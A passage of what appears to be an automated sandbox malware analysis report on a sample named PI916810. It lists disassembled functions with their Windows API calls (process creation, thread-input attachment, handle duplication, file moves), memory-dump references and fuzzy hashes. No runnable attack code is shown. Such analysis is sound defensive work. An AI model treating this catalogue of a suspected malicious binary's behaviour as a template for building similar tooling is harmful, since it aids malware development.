                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004C0778,?,00000001), ref: 004C172A
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 004C173C
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004C0778,?,00000001), ref: 004C1755
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004C0778,?,00000001), ref: 004C1767
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004C0778,?,00000001), ref: 004C17AC
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,004C0778,?,00000001), ref: 004C17C1
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,004C0778,?,00000001), ref: 004C17CC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2156557900-0
                                                                                                                                                                            • Opcode ID: 37d1de909ba32b4b86353fe7cf238226a1924677fa3664998d85356556b9aed7
                                                                                                                                                                            • Instruction ID: 31a9fa6a45530e5eefcde9f7ea4322c5b7c122120230d68265e907b945b29537
                                                                                                                                                                            • Opcode Fuzzy Hash: 37d1de909ba32b4b86353fe7cf238226a1924677fa3664998d85356556b9aed7
                                                                                                                                                                            • Instruction Fuzzy Hash: 0631D179205248BBDB21DF20DD84F7A7BA9AF6B711F10402AF800CA3B1D7789D498B58
                                                                                                                                                                            Function 004D9428 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Variant$ClearInit$_memset
                                                                                                                                                                            • String ID: ,,O$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                            • API String ID: 2862541840-475619936
                                                                                                                                                                            • Opcode ID: 4e99391135172803d5cb3b65de35b328a7b5fce040145d5234cec57f399ca03c
                                                                                                                                                                            • Instruction ID: 7de82d03cf070eb653f71b7e03a37dd11e4e6de2b9e2018b1bf40677c6e9415b
                                                                                                                                                                            • Opcode Fuzzy Hash: 4e99391135172803d5cb3b65de35b328a7b5fce040145d5234cec57f399ca03c
                                                                                                                                                                            • Instruction Fuzzy Hash: 67919B71A00205ABDF24DFA1D864FAFBBB8AF45314F10816BE505EB380D7789D45CBA8
                                                                                                                                                                            Function 004BA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • EnumChildWindows.USER32(?,004BAA64), ref: 004BA9A2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ChildEnumWindows
                                                                                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                            • API String ID: 3555792229-1603158881
                                                                                                                                                                            • Opcode ID: 10f9de9fc196986730d5742ef66132e6d8eae375fa3bbf75270bc613d54857dd
                                                                                                                                                                            • Instruction ID: 28e999bfcecf550da90db83135fcb91868afd26471a584d8c24bbc9547d53cc6
                                                                                                                                                                            • Opcode Fuzzy Hash: 10f9de9fc196986730d5742ef66132e6d8eae375fa3bbf75270bc613d54857dd
                                                                                                                                                                            • Instruction Fuzzy Hash: 9D91A870600106EBDB18EF61C481BEEFBB5BF04308F10851BD599A7241DF3869AADBB5
                                                                                                                                                                            Function 00462E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00462EAE
                                                                                                                                                                              • Part of subcall function 00461DB3: GetClientRect.USER32(?,?), ref: 00461DDC
                                                                                                                                                                              • Part of subcall function 00461DB3: GetWindowRect.USER32(?,?), ref: 00461E1D
                                                                                                                                                                              • Part of subcall function 00461DB3: ScreenToClient.USER32(?,?), ref: 00461E45
                                                                                                                                                                            • GetDC.USER32 ref: 0049CF82
                                                                                                                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0049CF95
                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0049CFA3
                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0049CFB8
                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0049CFC0
                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0049D04B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                            • String ID: U
                                                                                                                                                                            • API String ID: 4009187628-3372436214
                                                                                                                                                                            • Opcode ID: cdca2686e37cb4f4542d284a34e8ecd18be2e42416d4c8dfbb7bf980b8706e99
                                                                                                                                                                            • Instruction ID: 89c38f6c4f9dc9cd21eef08bf2e498dc078579a4fa4a82cece9db2a3fa25847e
                                                                                                                                                                            • Opcode Fuzzy Hash: cdca2686e37cb4f4542d284a34e8ecd18be2e42416d4c8dfbb7bf980b8706e99
                                                                                                                                                                            • Instruction Fuzzy Hash: 4A71E330900204EFCF218F64C984AAB7FB6FF49354F14427BED555A2AAD7398842DB65
                                                                                                                                                                            Function 004D8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,004EF910), ref: 004D903D
                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,004EF910), ref: 004D9071
                                                                                                                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 004D91EB
                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 004D9215
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 560350794-0
                                                                                                                                                                            • Opcode ID: 1d7b201ec920463ec7f92ea48d2868670e7d56f07df08f6615ee02ef07754848
                                                                                                                                                                            • Instruction ID: 2d525b735d970353174b4a38a99023b629cb8bc76fb2989ebd8c0fe4a905ed6b
                                                                                                                                                                            • Opcode Fuzzy Hash: 1d7b201ec920463ec7f92ea48d2868670e7d56f07df08f6615ee02ef07754848
                                                                                                                                                                            • Instruction Fuzzy Hash: DFF14931A00209EFDF04DF94C898EAEB7B9BF49314F10819AF915EB251DB35AE46CB54
                                                                                                                                                                            Function 004DF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004DF9C9
                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004DFB5C
                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004DFB80
                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004DFBC0
                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004DFBE2
                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004DFD5E
                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004DFD90
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004DFDBF
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004DFE36
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4090791747-0
                                                                                                                                                                            • Opcode ID: f022d7fdc2938c2e3401dc2957e40d260888083be55dcf33b9e9064dcdc6322a
                                                                                                                                                                            • Instruction ID: 47922b318ac1b892efea627e7dd20c553c8800449e845463786201b0ea36f804
                                                                                                                                                                            • Opcode Fuzzy Hash: f022d7fdc2938c2e3401dc2957e40d260888083be55dcf33b9e9064dcdc6322a
                                                                                                                                                                            • Instruction Fuzzy Hash: 6AE1B5311043409FC724EF25C491A6B7BE5AF85314F14846FF89A4B3A2DB78DC49CB5A
                                                                                                                                                                            Function 004C4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004C48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004C38D3,?), ref: 004C48C7
                                                                                                                                                                              • Part of subcall function 004C48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004C38D3,?), ref: 004C48E0
                                                                                                                                                                              • Part of subcall function 004C4CD3: GetFileAttributesW.KERNEL32(?,004C3947), ref: 004C4CD4
                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 004C4FE2
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004C4FFC
                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 004C5017
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 793581249-0
                                                                                                                                                                            • Opcode ID: cdb57ac36939397f74c181529f6a7345a252f3edd6542a24d52de90b62042319
                                                                                                                                                                            • Instruction ID: f7b79d19ada2c9fa1161190ca5676b7a0194a69eaa34a8d0677a9c18fdefd131
                                                                                                                                                                            • Opcode Fuzzy Hash: cdb57ac36939397f74c181529f6a7345a252f3edd6542a24d52de90b62042319
                                                                                                                                                                            • Instruction Fuzzy Hash: 4B5174B64087855BC764EB51D891EDFB3ECAF84305F00492FF689C7152EE78B188876A
                                                                                                                                                                            Function 004E88B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004E896E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InvalidateRect
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 634782764-0
                                                                                                                                                                            • Opcode ID: a5be269cb777b5ca74b594b4b1325b14df7c6e4e3b0bddadc36e731cc62d5a0d
                                                                                                                                                                            • Instruction ID: bdaa32fe1cf734ff2d94fdcd21372391405ee189156f3ac3f87297dc2671ef68
                                                                                                                                                                            • Opcode Fuzzy Hash: a5be269cb777b5ca74b594b4b1325b14df7c6e4e3b0bddadc36e731cc62d5a0d
                                                                                                                                                                            • Instruction Fuzzy Hash: 3E51A430900284BFDF209F26CC85B6A3B65BF05316F50456FF919E62E1DF79A9809B49
                                                                                                                                                                            Function 00462B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0049C547
                                                                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0049C569
                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0049C581
                                                                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0049C59F
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0049C5C0
                                                                                                                                                                            • DestroyIcon.USER32(00000000), ref: 0049C5CF
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0049C5EC
                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 0049C5FB
                                                                                                                                                                              • Part of subcall function 004EA71E: DeleteObject.GDI32(00000000), ref: 004EA757
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2819616528-0
                                                                                                                                                                            • Opcode ID: 377d5c494d6bb1a53649a520f11ccaf8760ba59944d7d34a8693ef3a8fa6fa2f
                                                                                                                                                                            • Instruction ID: 59095efac1e5a218af6b0bea07e165d5f6904e752e469f00b7917d8083c0f39f
                                                                                                                                                                            • Opcode Fuzzy Hash: 377d5c494d6bb1a53649a520f11ccaf8760ba59944d7d34a8693ef3a8fa6fa2f
                                                                                                                                                                            • Instruction Fuzzy Hash: F9517D70600605BFDB20DF25CD85FAA3BF5EB54720F10452AF9029B290EBB8ED91DB59
                                                                                                                                                                            Function 004B8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,004B8A84,00000B00,?,?), ref: 004B8E0C
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,004B8A84,00000B00,?,?), ref: 004B8E13
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004B8A84,00000B00,?,?), ref: 004B8E28
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,004B8A84,00000B00,?,?), ref: 004B8E30
                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,004B8A84,00000B00,?,?), ref: 004B8E33
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,004B8A84,00000B00,?,?), ref: 004B8E43
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(004B8A84,00000000,?,004B8A84,00000B00,?,?), ref: 004B8E4B
                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,004B8A84,00000B00,?,?), ref: 004B8E4E
                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004B8E74,00000000,00000000,00000000), ref: 004B8E68
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1957940570-0
                                                                                                                                                                            • Opcode ID: e9a3fdcb6d14319f1980580372577adeba3977d5c547007047ecd5053a77e248
                                                                                                                                                                            • Instruction ID: e7f18e3c739eba262e22463c7e0327dd18e26b369036eedafa2fb523d27016e9
                                                                                                                                                                            • Opcode Fuzzy Hash: e9a3fdcb6d14319f1980580372577adeba3977d5c547007047ecd5053a77e248
                                                                                                                                                                            • Instruction Fuzzy Hash: EB01A8B5240348FFE610ABA5DC89F6B7BACEB89711F018421FA05DF1A2CA759C04CA24
                                                                                                                                                                            Function 004D9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004B7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?,?,?,004B799D), ref: 004B766F
                                                                                                                                                                              • Part of subcall function 004B7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?,?), ref: 004B768A
                                                                                                                                                                              • Part of subcall function 004B7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?,?), ref: 004B7698
                                                                                                                                                                              • Part of subcall function 004B7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?), ref: 004B76A8
                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 004D9B1B
                                                                                                                                                                            • _memset.LIBCMT ref: 004D9B28
                                                                                                                                                                            • _memset.LIBCMT ref: 004D9C6B
                                                                                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 004D9C97
                                                                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 004D9CA2
                                                                                                                                                                            Strings
                                                                                                                                                                            • NULL Pointer assignment, xrefs: 004D9CF0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                                            • String ID: NULL Pointer assignment
                                                                                                                                                                            • API String ID: 1300414916-2785691316
                                                                                                                                                                            • Opcode ID: ee35603ccfebd3dadc54556cd4204a5b5385e972f7816c66352c9e3c1e516c28
                                                                                                                                                                            • Instruction ID: 0011d2dc9819afc3d947020abfd1fbe7f8958c671820df5c1895f36aed767487
                                                                                                                                                                            • Opcode Fuzzy Hash: ee35603ccfebd3dadc54556cd4204a5b5385e972f7816c66352c9e3c1e516c28
                                                                                                                                                                            • Instruction Fuzzy Hash: E2916B71D00219ABDF10DFA1DC90ADEBBB9BF08714F20415BF519A7241EB745A44CFA5
                                                                                                                                                                            Function 004E6FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004E7093
                                                                                                                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 004E70A7
                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004E70C1
                                                                                                                                                                            • _wcscat.LIBCMT ref: 004E711C
                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 004E7133
                                                                                                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 004E7161
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window_wcscat
                                                                                                                                                                            • String ID: SysListView32
                                                                                                                                                                            • API String ID: 307300125-78025650
                                                                                                                                                                            • Opcode ID: 479caab55668cb366915d949cc225768a165c6e5311aa2954e4ad3bcc6957c01
